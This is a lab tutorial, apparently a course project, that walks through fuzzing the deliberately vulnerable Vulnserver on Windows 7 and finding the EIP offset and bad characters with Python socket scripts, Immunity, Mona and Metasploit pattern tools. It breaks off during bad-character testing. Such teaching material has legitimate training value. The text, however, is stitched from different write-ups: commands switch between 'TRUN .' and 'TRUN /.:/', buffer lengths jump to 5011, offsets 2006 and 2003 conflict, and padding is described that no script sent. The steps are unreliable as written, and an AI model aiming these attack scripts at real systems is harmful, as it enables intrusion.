BOF2

=

Exploiting “Vulnerable Server” for Windows 7

Purpose

Learn how to exploit a simple buffer overflow vulnerability to gain Remote Code Execution on Windows 7.

We will use these tools:

  • Basic Python scripting
  • Immunity Debugger
  • MONA plug-in for Immunity
  • Metasploit Framework
  • nasm_shell.rb

What You Need

  • A Windows 7 machine, real or virtual, to exploit. (Windows 10 TP works too, so I expect Windows 8 and 8.1 would also work.)
  • A Kali Linux machine, real or virtual, as the attacker.
  • IF YOU ARE ATTACKING A WINDOWS 7 HOST FROM A VIRTUAL KALI: use Bridged networking mode, not NAT.

WARNING

VulnServer is unsafe to run. The Windows 7 machine will be vulnerable to compromise. I recommend performing this project on virtual machines with NAT networking mode, so no outside attacker can exploit your windows machine.

Overview

This project guides you through all the steps of developing a Windows exploit, using a program that deliberately has a simple buffer overflow vulnerability.

Here are the steps of the process:

  • Preparing a vulnerable server
  • Fuzzing the server
  • Using a debugger to examine the crash
  • Targeting the EIP register
  • Identifying bad characters
  • Locating a vulnerable module with MONA
  • Generating exploit code with Msfpayload
  • Creating final exploit code

Preparing the Vulnerable Server

On your Windows 7 machine, open a Web browser and go to

http://sites.google.com/site/lupingreycorner/vulnserver.zip

If that link doesn’t work, try this alterative download link.

Save the “vulnserver.zip” file on your desktop.

On your desktop, right-click vulnserver.zip.

Click “Extract All…“, Extract.

A “vulnserver” window opens. Double-click vulnserver. The Vulnserver application opens, as shown below.

Turning Off Windows Firewall

On your Windows 7 desktop, click Start.

In the Search box, type FIREWALL

Click “Windows Firewall“.

Turn off the firewall for both private and public networks.

Finding your Windows 7 Machine’s IP Address

On your Windows 7 Machine, open a Command Prompt. Execute the IPCONFIG command. Find your IP address and make a note of it.

Testing the Server

On your Kali Linux machine, in a Terminal window, execute this command:

Replace the IP address with the IP address of your Windows 7 machine.

nc 192.168.119.129 9999

You should see a banner saying “Welcome to Vulnerable Server!”, as shown below.

Type HELP and press Enter. You see a lot of commands. None of these actually do anything useful, but they do take input and process it.

This server has many vulnerabilities, but the one we’ll use now is in the TRUN command.

On your Kali Linux machine, in the Terminal window, type TRUN .AAA and press Enter.

The server responds saying “TRUN COMPLETE”, as shown below.

On your Kali Linux machine, in the Terminal window, type EXIT and press Enter to close your connection to Vulnerable Server.

Fuzzing the Server

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-fuzz1

In the nano window, type or paste this code. This is a simple Python script that does the same thing you just did–it connects to the server and executes a TRUN command with a specified number of “A” characters.

Replace the IP address with the IP address of your Windows 7 machine.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-fuzz1

In the Terminal window, execute this command to run the fuzzer:

./vs-fuzz1

Enter a “Length of Attack” of 100 and press Enter.

The server responds “TRUN COMPLETE”, as shown below.

Run the fuzzer again, but this time enter a length of 9000.

There is no response, as shown below.

Look at your Windows 7 desktop.

An error message says “vulnserver.exe has stopped working”, as shown below.

Restarting the Vulnerable Server

On your Windows server, close the “vulnserver.exe has stopped working” box.

Double-click vulnserver to start the server again.

Try other lengths. You will find that it crashes for lengths of both 2000 and 3000. Each time it crashes, restart the server.

The crash is different in these cases, as we’ll see below.

Installing the Immunity Debugger

We need more information about the crash, in order to exploit it. To get that information, we’ll use the Immunity Debugger.

On your Windows server, open a Web browser and go to

http://debugger.immunityinc.com/ID_register.py

Fill in the form. Use fake information if you like.

Click the Download button. Save the file. The file is 22.7 MB in size.

When the download completes, double-click the ImmunityDebugger_1_85_setup file and install the software with the default options. It will also install Python.

Starting Immunity and Attaching a Process

On your Windows desktop, right-click the “Immunity Debugger” and click “Run as Administrator“.

In the “User Account Control” box, click Yes.

Immunity Debugger runs, with four black panes, as shown below.

Make your Windows desktop large, and drag the borders of the panes so you can see all four of them, as shown below.

Now we will attach a running process to Immunity. That will encapsulate the process inside Immunity, so Immunity can examine and control the process.

From the Immunity Debugger menu bar, click FileAttach.

In the “Select process to attach” box, click vulnserver, as shown below, and click the Attach button.

Adjusting the Immunnity Appearance

The Immunity panes fill with tiny text, as shown below. This is too much information to grasp immediately, and too hard to read.

To make the text more readable, position the mouse pointer somewhere in the top left pane and right-click.

In the context menu, click Appearance, “Font (all)“, “OEM fixed font“, as shown below.

The font becomes clearer, as shown below.

In the lower left pane, right-click and click Hex, “Hex/ASCII (16 bytes)“, as shown below.

Understanding the Immunity Window

This is the “CPU Window” in Immunity, and it’s the one you will use most of the time.

Locate these items in your Immunity window, as marked in the image below.

Status in the lower right corner: this shows if the program is Paused or Running. When Immunity attaches a process, the process starts in the Paused state.

Current Instruction in the lower left: this shows exactly which instruction the process is executing right now. Immunity has automatically assigned a breakpoint at the start of the process and right now its execution has paused there.

Registers in the upper right: The most important items here are:

  • EIP: the Extended Instruction Pointer is the address of the next instruction to be processed.
  • ESP: the Extended Stack Pointer is the top of the stack
  • EBP: the Extended Base Pointer is the bottom of the stack

Assembly Code in the upper left: This is the most difficult part of the window to understand. It shows the processor instructions one at a time in “Assembly Language”, with instructions like MOV and CMP. Assembly language is difficult to learn, but you don’t need to learn much of it to develop simple exploits. Don’t struggle much with this pane at first.

Hex Dump at the lower left: this shows a region of memory in hexadecimal on the left and in ASCII on the right. For simple exploit development, we’ll use this pane to look at targeted memory regions, usually easily labelled with ASCII text.

Stack in the lower right. This shows the contents of the Stack, but it’s presented in a way that is not very helpful for us right now. For this project, disregard this pane.

If you are ready to learn more about these panes and their contents, see the “Debugging Fundamentals for Exploit Development” tutorial in the “Sources” section at the bottom of this project.

Running the Vulnerable Server in Immunity

On your Windows desktop, in the Immunity Debugger window, at the top left, click the magenta Run Button, as shown below. This runs the Vulnerable Server inside the debugger, so we can attack it.

The Status at the lower right changes to “Running”.

Observing a Crash in the Immunity Debugger

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-fuzz1

Enter a “Length of Attack” of 2000 and press Enter.

The server doesn’t respond. because it is crashing.

On your Windows 7 machine, in the Immunity window, at the lower left, you see “Access violation when writing to [41414141], as shown below.

“41” is the hexadecimal code for the “A” character, as shown below.

This means that the ‘A’ characters you sent were somehow misinterpreted by the server as an address to write data to. Addresses are 32 bits long, which is 4 bytes, and ‘A’ is 41 in hexadecimal, so the address became 41414141.

This is a vulnerability that could be exploited, but it’s not the sort of vulnerability to start with.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click “Immunity Debugger” and click “Run as Administrator“.

In the User Account Control box, click Yes.

Maximize the Immunity window.

In Immunity, click FileAttach.

Click vulnserver and click Attach.

Click the “Run” button.

Verify that the status in the lower right corner is “Running”, as shown below.

Sending 3000 ‘A’ Characters

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-fuzz1

Enter a “Length of Attack” of 3000 and press Enter.

alternatively use :

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.1.139"
port = 9999

buffer = "A" * 5011

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send("TRUN /.:/ " + buffer)
print s.recv(1024)
s.close()

 

On your Windows 7 machine, in the Immunity window, at the lower left, you see “Access violation when executing [41414141], as shown below.

This is a classic buffer overflow exploit–the injected characters are placed into the EIP when a subroutine returns, so they become the address of the next instruction to be executed.

41414141 is not a valid address, so Immunity detects that the program is crashing and pauses so you can see what’s happening.

This is common in exploit development–an attack of one length has different results than an attack of a different length.

From now on, we’ll use a length of 3000 for all attacks.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click “Immunity Debugger” and click “Run as Administrator“. In the User Account Control box, click Yes.

In Immunity, click FileAttach. Click vulnserver and click Attach.

Click the “Run” button.

Creating a Nonrepeating Pattern of Characters

We know that four of the ‘A’ characters ended up in the EIP, but which ones?

To find out, we’ll use a nonrepeating pattern of characters.

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-eip0

In the nano window, type or paste this code. This is a simple Python script creates a simple pattern of four-byte sequences and prints it out so you can see it.

#!/usr/bin/python

chars = ''
for i in range(0x30, 0x35):
	for j in range(0x30, 0x3A):
		for k in range(0x30, 0x3A):
			chars += chr(i) + chr(j) + chr(k) + 'A'
print chars

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-eip0

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-eip0

As you can see, the pattern is simple–a three digit number followed by ‘A’.

If I add spaces for clarity, the pattern is like this:

000A 001A 002A 003A 004A 
             ...
250A 251A 252A 253A 254A 
             ...
495A 496A 497A 498A 499A

There are 500 groups of 4 characters, from 000A to 499A, for a total of 2000 bytes.

Sending the Nonrepeating Pattern to the Server

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-eip1

In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

This will send a 3000-byte attack to the server, consisting of 1000 ‘A’ characters followed by the 2000-byte nonrepeating pattern.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 1000
chars = ''
for i in range(0x30, 0x35):
	for j in range(0x30, 0x3A):
		for k in range(0x30, 0x3A):
			chars += chr(i) + chr(j) + chr(k) + 'A'
attack = prefix + chars

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-eip1

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-eip1

Determining the Offset

To determine this, we can leverage Mona’s ability to create a “cyclical” string of data which never repeats any patterns. This string of data will overwrite EIP and provide us with an exact location of where in our string the overwrite occurred since we’ll have a reference point to a unique set of 4 hex characters.

To make Mona create our string, we use the following command in the white bar at the bottom of the Immunity GUI: !mona pc 5011 (‘pc’ is short for ‘pattern-create’ and there are multiple scripts and tools out there that will perform this for you, including Metasploit. I prefer using Mona since I’m already in Immunity.

Mona outputs this string (use the ASCII one) to a file called pattern.txt which is located in the C:\Program Files\Immunity Inc\Immunity Debugger directory. Make sure you copy the string from this file and not the pane in Immunity as the string in the pane might be truncated (especially at 5000 bytes). This string now becomes our buffer and we feed it back to a restarted vulnserver process in Immunity.

….

The lower left corner of the Immunity window now says “Access violation when executing [35324131]”, as shown below.

Let’s convert that hex to characters:

Hex  Character
---  ---------
 35      5
 32      2
 41      A
 31      1

So the characters are ’52A1′. However, Intel processors are “Little Endian”, so addresses are inserted in reverse order, so the actual characters that were placed into the EIP were ‘1A25’.

Those bytes appear here:

That’s this portion of the input string (with spaces added again, for clarity):

The pattern ‘1A25’ occurs after 251 four-byte fields + 2 more bytes, or 251 x 4 + 2 = 1004 + 2 = 1006 bytes.

Our attack used 1000 ‘A’ characters before the nonrepeating pattern, so the EIP contains the four bytes after the first 2006 bytes in the attack.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click “Immunity Debugger” and click “Run as Administrator“. In the User Account Control box, click Yes.

In Immunity, click FileAttach. Click vulnserver and click Attach.

Click the “Run” button.

Targeting the EIP Precisely

We can now write a program that exactly hits the EIP.

Looking further into the crash we can verify that there was a full EIP overwrite which is extremely important. Our next logical step is to gain full EIP control. This is done by figuring out exactly how many bytes need to be sent in order to overwrite EIP with whichever bytes we choose. This can be accomplished a few different ways, the most efficient way that I know of is to use the pattern_create script within Metasploit. This allows you to specify how many bytes you want and it will create a unique jumble of characters equal to the amount of bytes you set. So we know we need to set it around 5000 bytes.

root@kali:~/pwk/bof# msf-pattern_create -l 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk
If for some reason your script isn’t located here, use the command (locate pattern_create)

Once this is generated we can copy/paste the output into our exploit script. The results of that should look something along the lines of this.

We see that TRUN /.:/ is following by our pattern

Once again, if everything goes properly we will receive a crash once this is sent. We will attach everything and get set up to send our exploit again, once this is done, we will send our modified script and receive a crash.

We see our crash! And exactly where EIP control is located!

From here we see EIP control exists with the bytes of “386F4337”. Using Metasploit’s pattern_offset script we can see how many bytes in until this exact pattern shows up. Once we run this against our bytes we see that there is an exact match of offset 2003!

root@kali:~/pwk/bof# msf-pattern_offset -q 386F4337
[*] Exact match at offset 2003

Using this information we can verify that we have EIP control by once again modifying our exploit script. We are going to send 2003 A’s, and after that we are going to send exactly 4 B’s. If we do in fact have EIP control, the EIP register will read as \x42 all the way across (\x42 is hexadecimal for B).

EIP is ours!

Fantastic! We do in fact have full control over EIP! We’re getting closer and closer to being done with our exploit.

Examining Memory at ESP

Let’s see what ended up at the location pointed to by ESP.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it’s highlighted in blue, as shown below.

Then right-click the highlighted value and click “Follow in Dump“.

Look in the lower left pane of Immunity. It’s full of the ‘F’ characters we put at the end of the exploit text. That’s going to be very important later–we’ll put our exploit code here.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click “Immunity Debugger” and click “Run as Administrator“. In the User Account Control box, click Yes.

In Immunity, click FileAttach. Click vulnserver and click Attach.

Click the “Run” button.

The Problem of Bad Characters

This exploit relies on tricking the program by inserting code into a data structure that was not intended to hold code–it’s something else, such as a directory name.

Just from common sense, one might expect these characters to cause trouble:

Hex  Dec  Description
---  ---  ---------------------------------------------
0x00   0  Null byte, terminates a C string 
0x0A  10  Line feed, may terminate a command line 
0x0D  13  Carriage return, may terminate a command line 
0x20  32  Space, may terminate a command line argument

Not all these characters are always bad, and there might be other bad characters too. So the next task is to try injecting them and see what happens.

Testing for Bad Characters

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-badchar1

In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

This program will send a 3000-byte attack to the server, consisting of 2006 ‘A’ characters followed by ‘BCDE’ which should end up in the EIP, then all 256 possible characters, and finally enough ‘F’ characters to make the total 3000 bytes long.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0, 256):
	testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-badchar1

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-badchar1

The lower left corner of the Immunity window says “Access violation when executing [45444342]” again.

To see if the characters we injected made it into the program or not, we need to examine memory starting at ESP.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it’s highlighted in blue, as shown below.

Then right-click the highlighted value and click “Follow in Dump“.

Look in the lower left pane of Immunity. The first byte is 00, but none of the other characters made it into memory, not the other 255 bytes or the ‘F’ characters. That happened because the 00 byte terminated the string. ‘\x00’ is a bad character.

Restarting Vulnerable Server and Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click “Immunity Debugger” and click “Run as Administrator“. In the User Account Control box, click Yes.

In Immunity, click FileAttach. Click vulnserver and click Attach.

Click the “Run” button.

Testing Again for Bad Characters

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-badchar2

In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

This program skips the null byte, and includes all the other 255 bytes in the attack string, before the ‘F’ characters.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(1, 256):
	testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-badchar2

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-badchar2

In the upper right pane of Immunity, left-click the value to the right of ESP, so it’s highlighted in blue.

Then right-click the highlighted value and click “Follow in Dump“.

